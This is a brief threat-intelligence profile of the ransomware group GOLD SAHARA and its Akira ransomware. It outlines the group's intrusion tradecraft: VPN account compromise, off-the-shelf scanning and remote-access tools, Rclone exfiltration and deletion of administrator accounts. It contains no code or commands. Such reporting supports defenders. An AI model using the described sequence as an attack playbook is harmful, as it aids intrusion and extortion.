GOLD SAHARA

GOLD SAHARA is a cybercrime group that deploys Akira ransomware. The first Akira victim was named on a dedicated leak site in April 2023. There is no evidence that Akira is operated as ransomware-as-a-service (RaaS), but the rate of naming victims on the Akira leak site, at around 30 a month, suggests a large group of individuals is responsible for ransomware deployment.

GOLD SAHARA exclusively uses off-the-shelf tools and built-in utilities to conduct its operations. After compromising VPN accounts for initial access, the group uses Advanced IP Scanner and the SoftPerfect Network Scanner for network discovery, and the built-in Nltest Windows utility to identify domain trusts and domain controllers. It uses AnyDesk and PuTTy for remote access, and the WinRAR archiving tool to stage data for exfiltration using Rclone. The group has also been observed accessing and downloading SharePoint files to use in extortion attempts. Prior to deploying ransomware, GOLD SAHARA deletes administrator accounts, likely to hinder recovery efforts.

Akira ransomware is written in C++ and has both Windows and Linux variants. It is based on the Conti ransomware source code and has a number of command line options that dictate encryption processes. Following Avast's release of a decryptor for Akira at the end of June 2023, Akira's developers made changes to the ransomware to strengthen its encryption routine.